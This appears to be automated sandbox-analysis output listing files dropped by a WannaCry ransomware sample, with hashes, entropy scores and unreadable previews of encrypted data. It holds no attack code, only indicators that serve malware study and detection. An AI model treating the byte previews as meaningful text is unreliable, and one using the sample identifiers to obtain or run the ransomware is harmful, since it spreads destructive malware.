                                                                                      SHA-512:62EB062F90904ECE5734AF27928009B9AC6D746E42BAA12DDC26C5E39AEC7AEEADAD1D98FE191E625D8EE6B6CE6E8A0D7FB03B19E81902C6ABE1E6221758B71A
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.^7......Su.K.=.......E....%d.Sq\...['..,..3." ^#6.Ks.#....C......j.....W..@.69.....,....f.....x.M.....X.s>b.._z.Wb...'QH...`k..r..z......E.T...0..._.3p=M7.t*l..ot...q./..6G7@....^x)...,+d]......NL...@>...S.@.W..~-.x.L.....A.(J..q$......f.4..v..<(.OVD......a.m.e,._..T..|-.Dk.......0.l..r...B..`{...,h.r.2....$..... ..}..u.[@.U.F{.............h.RV\./_..<...r.t*..w|+../^...L..=S...M(wL.e%..I.......*.M..6@j.....ny.T...d.Zy..U.L].\.a..q.]e...L.r,f..ny....f{.`..<......9\....Rp.Q.:VJ......o..6.q...P..o._....6b..2..U...R..y......jR.....o...[.......Duo.+.j+....k1.....F...UaB^...e...7&vi6eeH ..*..H.v.[....L9X.j;.>[i....sR2jE..ES.G..Ud....]..b:.W..U...../..m..fp}.".E......3r.3.sU-J...p.,..9.>c..};i.J.B..M....y.-..;..//...k1b)......qm"L...gw..s[S.G.7&O..m.q....<Sp.....4...}}D..;........6...>.;..T.?....%..........g.. L.qQ*..Q.....x 8...[.....C(....@..i.)`~p...u..5U.%..k3B....4.qf....8.:.+.j.......NE...Q..3..XS".b..6...Z...JV...T.....d#.pp..s...(......o.....a.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.8384707308472885
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:57OyNKj+qtNWKVWomEjmJ7jyAI9A2bhfq+x20rR:yj+qzBZjMqNbE+x2YR
                                                                                      MD5:33D315C5C0CD8312F1CCC6F3E90DA013
                                                                                      SHA1:3DC7ABDEA02E7EAB319284076E2FBA92777582FF
                                                                                      SHA-256:8E4F2EB6FA3FCA15271CABDE2254959DA0D0541957CB24E4CD06A6CBCB1EF390
                                                                                      SHA-512:88AE56BC1FD855323CCD74C6BFB92E655A616EF9AFCAEE0B8459FAE5B9E8F203ADE04E0A22A5651279E59AF26C43B452B14D485A682D431828EA14FAF8B8462D
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.*....\1[..w[2.f.9...p.2..\(.=u%;s.........`L...x..H$.}%l...W..l|..".........#.$|%2t`.^.{....r{."i..?).u4C=N.q..Fa....Q...*1..e.!.V...mWs..~.3_.......J|%.;..O....;....0dm.w..@......b.w..@.J..S.7.]!w.e.......Z......$...q...*.c.#..'.f.j.5...Z.... ................-.Jj.i...$...N..o<..O....wh.J.<3Z.w..x@.hW?#0.k.../..t..In'.d.9...f..QF......$.zze....'.....#....16.X....Jv.X.B..}.)3..........I.........m..2.%8.bvw}..rh.:.....Z.T..0......2N..'.n.1....eX...o....wZUm;....3(zK5........V1...i..*BM..d..v,..o|.bM...... ....o.6..........V.y~... .d.!.g2A.!.r.w<..R........t..C.j....E....l..~@.....0.T..ju.9...;...*.W5.u...(......L..=..,....-N..?.....aPo...4wt....X.[\.@{..O..]...R....{.Cek\..<.5...G}.|.4O.....*.I{#.w.<]f...u....+'~p...k:.;......'[...L..4...(......U....)....TY.....n[.=....`.'..d(...".#.`.-.L...S%.ZM...........a......C.5.s...;Rt1Y .<*.K...N../C..I.)..%.MfL`..)\S.....2"..x....2...K....Y...}..P.H.V..L.vi3.}.M.........Z..#Q.Tm..Q......t..Py{>0.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.825868176832101
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:p3K/0rvJw2bG+tI0nCxufCxMA1ezWukBcu+XoIxn:p3K/0rSaG+4sC4q8ucNn
                                                                                      MD5:1B55D5A604DF938F35BCA166B777FA60
                                                                                      SHA1:83C586A11E9A372BEE03B6B4234EDCB6FE5CE8DB
                                                                                      SHA-256:DAA745F509B95D6E31C536DBC70CA2E1EEDA7263C474D960ABD5216E8F17C287
                                                                                      SHA-512:769DC18EA3EA09217E03509295570FF74FD89C0A061861BF4984430B24F4A772E9D9C36DA302ED40AB5A27E173CD129577EC0998C224CEEEBBAE91080DA517FD
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:....U4...z.....jm..@.....Do...6.....Ip...Q..c..s4v....N.(.....P..)Oe..hGe.N.N}...rp....J.....?..t:...|M.3..[.S.....I{.%..........*#V:.A.A.g...YC....@..O-.h..s.........Tw.TPL.Pc.".Y...(v..+;eB.,i..dZec.W....H.T.q.5.0N..-..sV..D`... .>O.......:4|.1.I&....W.r.a..:.....X.uY...H...&..C......N ,...x.....lk..;....F9;.....RkH|s. .+m..mD.4..;&.\Sq"8...f..NG....t.....i.|E.R....eqj..f...u8.....[a.u....U.Q...?7.xi.n...t...;.....G?G.9..!...pg>.f+..\}b.x.^iI... ...6.C.&P.<...s^H...Z.o.u\.3{.3..._\.)...-_..9v.."...p.M.....*/`.....G..x.#D...PS..w...#E`9.....ao=......BXU..]......4n...=......N.....&....o#..A..X2C."|.s,........bz.?..m2....(...[.5..e.y.......M34..}.8.`...WqIl...+k..B.........|..?<.P...|.Ih......M.......eU@..Rc;/....6......<>X...<..Pg....db....8......J.).R.eZdg%.('U.j.~E...z;.o(..&......5....%.N.o..5..^.Q......;.4E.}.m.L..^.i..9.....B.<P1J.v)@:....at....w........L....S..$4([-...$t.....w..4.....T.P;p.u3&.5...q..7.3c..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.834498446594247
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:9/HcpZDDTR4rB16/O690HcSTU/aLuMICTOu/TPv0mE:mDIzsO6e8oQaKQlTDE
                                                                                      MD5:56CC2751090A40E062BDEFAA94708C1C
                                                                                      SHA1:6CF958D8AAC2E66569CFA8B26D081982A20D2E32
                                                                                      SHA-256:07BF7E7EF74E35C60E14EA18296CF799F183532ECB375956F04FA10718ED3724
                                                                                      SHA-512:189BB6FE5F3F85D97B14D99B8C3D95969C97C45BBA6C064BAD178C94F7767EEE4DDF134AD0D7ED01BC8A134B7B2E8F311D7AAA3DACF322C30F48C55D7C1323DF
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:..._. ie..p.}.r..b8.S.."........0....Q..r.........uZ.b.3...[..A.Zr=.<...9[...f......l...Q.^n..0o[.o...h#...v$..(..K.... .%Ne..J...k...<*./..*../..5;..\....y~..|.e..O.Yjk..q^:..R4...8.V.pB}Q<5.9.....?.u..Tl..^.r.#..7...,....]v[.."L.T.Q...+\...;..@.%l.8{.+....(..iV.x....-Wq.7K,y.....,.....?&......}T....b!T2Q3?|.a.....bh.a3.5.....j".!8n..E/..c..C.........kU..8( E.S8+..M.0..#..~P\m...g.K.....@..i@....@.g....B.F"u....6j...9<.O*.......2U..w..(YG.c.{)..#_s....&.a.}.Z.z.h....R.:.'..,I.t..l.w}.l..&..,... Y.w.a.{[..H...C....(...2..0.)..5.M$..Vh..`.BQirQ..<k..._.=....MN....D.f...........Vw..JU.+4.-`..G.{...2..X....!>.%v+....].f.koC...........b....k...5.?.w3.~.q...X\.[.:..J..l..Y...1.?....%.....:[.4.p.S$m...PF4IO.DP....B.C.@m..Y..A...N.#..y...q..?9.qY..{...':O...oF.9.Kq...g.....S..K...~ @..:.WC.-..s.o....W/w.C16..:7..E.a.K..{8..._.|.iW.....cF:.c..Lz.]..R..)...@p..TIu.z.!(^..n.W....V.wH.Y....x...)2{...a.S~......-..t&.#.S...@...3.M...B.!...A...6..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.791231106897536
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:8mINA6S4iVC95q4WZPB4dThT30qQSPQNr94H4Wgr9R:DINaRg9JlPQpS1y
                                                                                      MD5:A0BE15FCCFF12765EC63C732BC3DC2BB
                                                                                      SHA1:240B9227869357FDA364A0D8CA1DEAE4B555797E
                                                                                      SHA-256:92E027CAFD40301B7240E5A49F81E7116D4860CB5F15C83167B9568BE50410F1
                                                                                      SHA-512:F90A5D8A0B031CD248474345BCB68AFAD35C361E30960C13A8FBAF69BE8762EEE0F5175A3DA3ED7F7C701C5C5FA535C2D6A8227983F205077AFFB1C3BB83B4C5
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:B....*\%.3....oK...,j.h..'..!....vz..X..A..v4!.B...az0.O....k;]....".....QL.....Y....'./R.V.).).......S.....1...k..}........L|..T.'.5sW....3......}0..T..........%.^..6.....,8;..wk..N.....H..;e..4.L.5..a}.&@q.$...-...lP&..a....;..O<.j5;.......j...;..X.%...u`...#....2&.)....q4...y.d..P.)...x..&i{Ao..7.(..U.XP;.V.6...M..!5..&B.D..kB...x.'..)`.];...6...i..........f...nD'......}.<VZ....{5.Bei0....Z@H.{1m.f../R..mC.j...........z.q..;f.)..........K.D.7.;KT.....3.Hp...i.NPPgR u.....\$[...Y..O.0.<..oJ/.g.@..=Z..<._....{`.k..#E......].yb...&....y.....n...c.. ...-..W.]."....Zs._9.. ._.|q..Q./.bkr.@.L!?.|$.f..@/.!.`@a's$@3B.....2..tX.[4Rw.r..?.{.yMgt.x.d>\...G6.......m.S..W&.....y.rL>YE..\......>,..Q!.....U6..z..$..t./6.....<..H.K..[...C.u.e.......JQ.....!.O.b."Btu....:...{.P...JG*.RE......%#`......~....0.R.#.)..#.#.vr..HY}..$B... .....=9GAK..I+#...W5wf5T.G......-;(....w....l....|.....KA..<.|h.B<,O.+s......wO..(x..U.~VEy..M...c...A%m..V..;..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.835980219995817
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:sq/9gJBViFGS08UFvpmTxrZ5CCc2/HM674gEK19wBSPJFhPDLOeTxb+j:sq/9grViFGLEJOCc2PM674gbuMFhLLOP
                                                                                      MD5:81DAAD86799583BA5E7827782DD1CB59
                                                                                      SHA1:1FF6345EE59F3C0B866BAEA6B8BC2692A0A726D5
                                                                                      SHA-256:79A35888A25D250BA397EFDAB1BA456BDBBAC319B98D20D0EB3EAE62501C2BC3
                                                                                      SHA-512:211BE175708F0DD292800D6D983750DCB958F9738194357B10252B308E3DFACA80F4E0C2B2B1EE249A757CF89ABD5F994F12DE45C7008ECE684261926A3262C0
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.~-..^..'.i..P.MwD..B.5.."g..,>.:....Z......ps...!$.HWu.^..m...........W..}MW.|7.....".......]...y<.Z..P.r..|.g.=k.W....$. .....y.h.m...l..E|.Y08H=1.-.n'e@.3...OC.B\.kn.....l2..[.s..sQ.....vP....+..b....V..................Y.OO......=,I.-M.(..H...W........RUFJ.Y.I@.....f...*.."...M......U{)Q.ly.!J8~.ZQ./......@9....b0.$....).>..n...K0.z........R.^...I..v..~4B...;.....r..=d..;.7K..2...S.rDj.g.#..v.z%..H]..h.4`.aSY.L.#...I.B...xG....Y..)...&..e.'.....;hDf...6...}8...Q.C.I.....r+46[...p-.|.FG....,V.lr..r.'US.;.m..k..._c.Z#.tA.H.x..,.c.7(.j.Y..b.P....h..4...b.p.4.V.|5..Y...t[...K.f.L1...g'...Z.}(.j4V.T... C..:.7.d.r.f2...N.*..ekj.V....._,.*z.I.q..u.....%....h.\.1b.ZS...\Bi|.....C.....ND..mPY......)....a.Z.S.......f....<......y[O....O.+..QJd8....Z...g...g...?:.T>.l&...S..9M..:!....~..e..#....@.vN8...cQ.R(Q.).....GG@...x..-...H.3....G.0./N..Xi.*..9../.l.E..C.0.d..oS'..o..,.QC..H...P.}.Q.e.=6."..25&....m.8CJ+...`.,pY..HJr.8.Q38...4w..U.....N.......
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.788831827307464
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:d0K8geXzXbXuEBBFcZTpDaNdQSnW3ytfHOD:dMgwL+EBoTpsyP
                                                                                      MD5:E659098F67113E6C7359D7ACAAB6C3C5
                                                                                      SHA1:AA99E9EB6DF7D40CEA2805165AE58803219FA232
                                                                                      SHA-256:31F160C501F65185ABEA1BB6A6DF69F93DCF2DAAB615BABDB9569298212CCCA4
                                                                                      SHA-512:5F37268E3E0854C389C4AA5D415693BDC06D5D4B995A9DC2E2B66D649F5517221A88480FE22F265880E386081F28D4002CE459B750140B4336429D3A985AD5E0
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.7qbT}X..>@@..^...4-...!S......[..$..d........oI.&G+.K.s.A:..^...9.]..........sVA7..2.`..S... K.....-...M..".0......t@X+.W_....q..(`.....Gp...A.p....).N.....\.-=R...&.G'f.F../$..z.x..@.[.+..q.2.[..A.|n.k.6..52./...4.o.F....:u9.......{Q... ...1&TW.Y.4...Zd2:...V.P;Y.(....nq..aF.-k5....]...j.bu.2S....Ujiq..o<2..g|..Jq.%}.?....)d...A...M....W......=....}_.j.....az^}T.........@.#k.~...:._\....)5.K.h(...<!.Nw5j.7b&.+[..,3.Y..e.d......30.a~......%...Q2.U.X.L.......p,.._.@.t.k?._.#..L../.H...3....W.&.q.\..>...7.B....2.+.....=...=I...9..........S97..Z._e.Sg.7b.y...i..)....y..o..E..<..[k..+..O.5M..>.....f....J....-"0.s..Y[.-...x..UP2...5mt(...]..#K......f.;... .e#In..U..!.v..kB...R...M..Z....u.o....<...x.b.x..F......d.B.....oP.*.J..{0.....hMfj...U..xwe..AT..E....!4;.....l.2g.Ov.-..n...-.... .........]H.*.+s..Ou..@.r......!...... .....h...b.............@..3.5..3M.#.6...b....\1j.c...9f....".....j.[.;..*.oK.....Ec.R..2..9.....?v..K'd.0f....Q...n...&..1b.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.806294829430766
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:PrpA7eLLChm7fM+2f1gCF5368itxsln0S8+Rpg:P1A7eLLChWf32WgHYxAn0S8V
                                                                                      MD5:81053448221255AE19F1438F14670ECB
                                                                                      SHA1:16EB6CF2CFAEA8FB33036644BF6EC9DC1B6295AD
                                                                                      SHA-256:E292FCB609D0B2EE25A5F20E654032E87A3CF839F57D10E5F7F6A73613AF2E17
                                                                                      SHA-512:B558625AA2DF3C7252B1ACDEB1CD12A3B953F83E500B2DD9D0896E56076DB65E58A8FD133A39F9A16B25EB98B9AA642AA614BC0DD8CEE1F2EAB2B657DA4ACD66
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:S.4..#.F..x..,...b.....D_.r.9..'...`'....pp..H..........^.@..H.t.V.p.....y.r.....x..<.....Q.s.....t..Mu.Z=I)...wpNi0\.%.Dn......$l.....S..ht2O..}L5..Q.j...N.G..H*.{..A..&z...*}.......F#$.....:<d.3...N..q.P.s...h^%...2_.J../..bR..3b.z.{O.X.....@J.w.>DO.Buu..K3..M.[..M..!G/C.-O.4`.{E..4}..G..7..d.='...J.......ks...P.........>.....+v.a?a...n.a../......../..J..w.8.c...K....=.......y.~G..H..;..Ov=...^.Ym.k..K.5.o.......X.M.....V......[...j=.S.|....b.Z....{nBPi..5...[.{..~w.mO.Y..F.=.1=..b..%g./..Y.....h...u..$d2.R....:...../.L....}..K...N..... vm...l.w7.<`'.m.rpe....4..M.l...5.c..r..z..g..^Y...,.E1..y|m.y...>..d......@.@.1.w.g.QQ.H......,..Z.....&..._...>....=...,.|.w..s.].$...}.....".(....v..W...m.E.1...)......M+6p..gp.T....%..$.l.w.8~g].hY...>/B.V.C..,.."..g.B0...N..E$...-..>1a.=kE.|.#EOq.,...x..`..*&6V(.>~..?[Q....2Wi0.....O!.....&.N..6u..:..Hg...z...P.A.>.5..u.........{.Z..|Dcv.z.........-vm.y.qH.T'...P..%[Q..F....t.Y..|$i.ws!...S...~.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:OpenPGP Public Key
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.810802167766141
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:1fRmbHCcW1HxM7uKCKBKFv7s/nQyMJl+DiOdGFJ5gATP3PJZ:ibHmHKyKCaUScsdWP3Pn
                                                                                      MD5:4B1403C31F1AABB2DBCF0ECAAEC1E5D5
                                                                                      SHA1:2BF302E88668EB81059886D88248972DD8C63BDC
                                                                                      SHA-256:0A1C8C936CDA10FB15F8E4EC00EE026602960725DE05E525340FE4D7641283A3
                                                                                      SHA-512:7AF65042E78313ECD913A0F7F5ECE2CF36992C59D2422B72ECE771C475B23358EE8C4F79CCFF6D9C4765E8E9F00141F31A0D29A1D92A882192FF4E75ED1BC694
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.>d..C/.....@ zFI.dQ......u..o.Tj..!..{.@..........+. [..E....... .........T.....7.tp...h*..G.T....]...dne....Z.'...f.6b\..q.9.(..AO3~..v......nl..Np.f...'..H..($.WM..0.b.=..T. *..,._.&.B|w..d..7.......q...D.../.!.A.L...,...`9....zl..V.0....;eE....?=#v.H..4....U.Cd.T.\V`..9.@..Nd.'.R..I..$.ec.5?..{.rT.....$+.r!.l..z......K%..y..\..W...Z...s0......\C.t...V.1..yW.a.........Tn]..A}A5+/a.2.K......2...`Gj...........l...@Q.x5..j7.(..6#.".j.r.[.$.E.2.-.Q,..Vs..3..#.|..U..m+.j...Xo)MwN.Br"\3.H.~..x.7(lEk..."h~H...4.mo....2.L.....u3.&...?.....n.. .##.(.J^.j*.:.0.gI.'...(}g@(^..!}u.......A.N...>.!.....%-..*+.........R.. .Mq...zCVlMI...*ss..r..'...OdM.Yip..BL..A.\...V.T..n=.}-...k.l.....%..W....;T.d.vz......"...`.7..P.......&.^Y.ik.D.../}i..Ni..X......._...p.-......cr..R..........+4.O...TEm....bY....[..e._I.. .5F..r....Ia......C.^.s..L1..\.....z..e..9..y.x-."...(.....s..).z/~......0.{..A..\....`=.=.....[o..d..%..(n|....{...z.....V......V=.AQ.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.8415587234469175
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:Q6PqXdeqpBJkm6zse1kAkgvA8YUel/AfRA+XAL8XRj1:odeuczdqLqA8Q/6u+XU8X/
                                                                                      MD5:37D72C8AABBD20FBB700BBC64BC9E073
                                                                                      SHA1:17CB89B7A20E014FCAF00B76C00318AF3B8494A8
                                                                                      SHA-256:DB8BD1C2C189EFF93EE80CBD6658484C84ED934CDEB674C668D9D47AF3CC1926
                                                                                      SHA-512:4C6BD5DF3E9871A0078602F4DB39285F20A076E69E2C0491310DE523AA5A05CC0D0AB0D5E578E278F55C9980FA091739EF603D2C0D2C11B8F27783610DBDE3FA
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:w....O).>.9.._....8.fp..*KG`^..,b2..Bu@M@.p...:.W.........B6q.T.......7...mp..<...7........pQ$&.R....*.....][.];.3k....D..$.jj.Z]..d._.D98..$.X.5..F.QQ....R.]...k{...Je0..[..t:%._...N........}.......z.Ocl&..c..8.#..j....L.;..... ..xRy....x~.tEc.E...[......H..m5....Z.wA._.....-.k.fjO....~m........\.~......4$.b....7....4.Tp......O...x..$-U']}... ...........)_......4..z..]p..g.K.g[.."...JI3.......G..G.jS.}NgF.=........|.`....ao\.9S..er...adJ.l...V..x.d.c.3 HD.....:...-h.......'....'..i7..\.....9D..H..`..5..f....B...D..........c....$..[A..}...\...6.^v..Sr.?P.$).'....<0U.?.;....P.. ..Q^.7L1...E.<.....*...D.@=I...F..I(K.'I<..l.x..V.K.{..aOj\\...Ma....L.P....y.._..7.X3.l.*aR.CD.H.8Q&}Q.?..F#..V..a..U...vd:JW..WH,.O?.0}.%Y;......V.x.s..x.@..s..ZK.xs1d!.~.t.e.tvi..{...."..t..x.|z9....y.......O..V2..HYn.y.._p....Lw]..bp..x ....%T....p....[.^.6Cr........E..b..U.. P...,...c.....h;Fh..v..u.EF..G../9I>.m.fb..C..0b...H..yqV...-S.....b).l.D.'JI....r..;...s
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.809889432837915
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bzRy3J5wb5sPfwCgtn7KKR5cmFRYBOSBRxJAc9XTHFbH:MihZ7Lf3F2cGxl9XTlr
                                                                                      MD5:ABC510663C65A570DD58BCEA14123AA6
                                                                                      SHA1:483EA5804EB701FE9D647349005F295DF7186C62
                                                                                      SHA-256:CBAD590D9677BA0D19476E3815F2809FAA093780A7146E65ECDC1162C3F0AD01
                                                                                      SHA-512:4180D79C80AF257BB61E99FB7A204FE300B103C706EA3BC37B68387982DA5F566157E3DE1CCA894D0C9DDD8580523C3B8CBE7390D3B499137385D8805B0EEFFD
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.;...p...0{.<^=(x..-...........T...c..u.t..e..P......H.......7k.m...E`.7).{z.,nk.I.wv..K[1.k]u..n.y.ZX......!..)..[...{.nP...Az.^.....:M..9.jH((.5...9...g.(.T.K.Y....z..9..e......k. .....p,K.j..iY..f.oD...JY.'...@..zB`...e.Q.vR.U)4...=.E[.f?J,..jY...6..}'C.`.>U.[..V..1X....mPkA.l+.^V..B.:H.e...E...qs.CJ..g..[St.1..1..v..o.){..{.J.".8.x..:W...1.x.:_...at.I....}.F..VA...].Y.K.`].8.?...:hj..6...TZ.#....e...C.......y ...$:......NJ...g....&z...?+.O.V;....K..Lje.t9.......4.....W...C.%....?.....f.U=qf.m.M.8.....1R.......b;.2 ..Y,<.....B...n...M...'.Z7..X'T..f.....;./.hG...>..X.).!$.w.4....Lt.I.b.Ps.....A5..m.;U...^....MqH8\n.wn1\N..F.\.Z<..Dz..V..aj..G.aD..?5.....|...<.s .#.....W.0.2...Y.....B.....t....h.....md......x$.ue8.$.=.P....&2.\....p...k....5..h/.8.Ad.........l..?8.^...;z...4O.s..!6C'H4... ......4...>. ...\..1....H.;.j.M.D..C..X..lt.z.uE..b7'...}........?.)...IT.p...(.n.a.l......N.._:....\...<......w..3...L.....1..k...)5.....@I.k.v.u5.n
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.7649740769950935
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:POEk1qOgjYvI3+gvzvL/G+zTUVr+Sc6vx2f:POj1qOk+grvrfCivgG
                                                                                      MD5:FBD97B74B378466B0CE18D3DBD4F6DD4
                                                                                      SHA1:6DB08F5C535B96E0BCCF6C237F7D4020C7A6D155
                                                                                      SHA-256:ECF3B2431799EC84E6E690F4D62755B1BE2F892A066F6607E6C5CBCAF4B7A1B0
                                                                                      SHA-512:BA0BD057A0C7AB5364FB75D84F68679EB9CDAE6DAB0990F1783F857BC9CD6533ED024DAE61A1715DD7B25E4C65834D25C90CAF46B84E1169543B477EABE8EE9F
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:..>'.i.......A.e.>....'5.[..'61<r.Uf..\.P..n.....R..... ...IT=.._l....g...P..2...n....1.\..\...-..6..X..._J.(q|...?...z./........1.....!....8.@.k`)/......^M.<.&...O...k.K.v.[.!W"...%@..,..X....R.9[...-Qk.$...(.B..GN|;.._..8...z...v.`........)0L%..f.T/..o.W.c.J....M.....gP.d..'..r*.DW...p..I....c.:.00Pz..2].a....".....$....l<.$6..?.t..!...e.cN.%....N.''....j.x.IC.1...5.+......C...e9.Q.?.z.....r......u..K..B.z*.....$XZ..z? ......%p..\._w..[...-....H...g.2U....'...a.q..........?.z.2l....j%....7Y.......a.L..L...?....Tf..I.\u]...B.....4}*.H.z......T.e.-...C.[A......Hk#....)%..Hz...jN...2.l....M.Ny......R.D<.....|.D..k._.RKBY............".....]..N.,5yz,pH.u......>...T..$[._..S.....p&x....ak....7.ey......... $@....k..}..x...x.C..d......K..F.\..]?9....M...[~.... ...C{..... >...'....P.2...CU.....4`T...w.?....7..v.."g..E.....c...%M...X9.+.x..za<.a.C.6...2.*....60.6..Q.......m..:.2.7.OL..].......u.]........_........:........,..[$..G....+#
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.833755953827884
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:yODft0P99sPvXwhifac0em+J4w0RgJagxCj+pMDUBu:yEE9GPvXUw5CwXrUCpu
                                                                                      MD5:EC90D30C23103F180FAAB70A45077765
                                                                                      SHA1:1BEE6F715B4697440749EBD6BDE5FC358DB5CF65
                                                                                      SHA-256:2DEFFD7B17CA589EBF7000A1372721409751B434C6483687B019D9FA1B9888E1
                                                                                      SHA-512:6877FAFFB8C2BF8E4D1711B53925235362734327750A7255E9A1DEE887B76CA30E4B355946EC1E690B25FF220F37C7AF566417B9743009AD1178EEA24000CFF4
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:....W....:.......W'.9..=S..d.'..b1....W...jmM..4,......L.S....,.]...;5...].Xz*.7v.Nr.{N..GT.=..V0...Dqiq..mQH.?f..=.Rz...m5.*.|.iV.`....M.(.....x.h...8h .X.y.....jC..}..d.r..uKsE...B.....S.F~Q...M'.e.X?..J.=..J..q}.?x.*..lo....8..../S.D.I..G...k._.)...i_.v1..6.....+.k..#......D.f.k^.N..}..E....7#d;...'.:N......4Q.N..y..7}e...5.>.z.!...M....f..9...W...&..kY"?.#.."..l!..!....".k..x.D-..$)...u.)....._z........U.3..sY_.O&..:..[hz.X7...8..k2.\..[..,O.n.r...0T....R...b"+..........,;.[.Gp...Y.r...A....1~..t..........P.....l9......L.p.'.H3.~.E..M1.c.0.~....P.r...5..+z.]..?.....[.............Z.....o.U...1.a\.r.4.<..l..p......GS.h.M.........t...'..F.=..*.k.....}.....i.c.8O!a.Q..q..%...g.b4.P.)....i...*x*t.?C.Z\...L#......%.=...4..>j..rx.7n.yU...aL..^.f|..X@.Zw...%.5..C..Q.z@....wY$.6(`...+M.q^..$x.....?...A_n.oC,....n\....wd..3W.a.52...Q...e_bQ.`d.&.........l.T..Q..ph..W...n.........a.sp........R.jE..r...J..Q#."..<....e.....0C.H2S...h...;.JB..l.04Oz
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.823141525329643
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:F/MluML0rGao1tKl/2r1/qLj0RKHkzcDW4A:F/MtwCaAk+xqj0aAERA
                                                                                      MD5:94F211C59350EB0744CB2F525623E66F
                                                                                      SHA1:27CD11E11008CCAB9F1CE511284557309EB97FE3
                                                                                      SHA-256:05097631544FD2038A82E6206B0BD45654CEE51D5BA6C14AD8AF25F57CB49BE4
                                                                                      SHA-512:7398704F91CDC803270C535C77709794B4CFCF9BE3D61550C2F248C3B539E6AC253C4209609B7068BE7FF7ACFA0F57C678085D9D9790DBD15BDCD68BD4C2F148
                                                                                      Malicious:false
                                                                                      Reputation:low
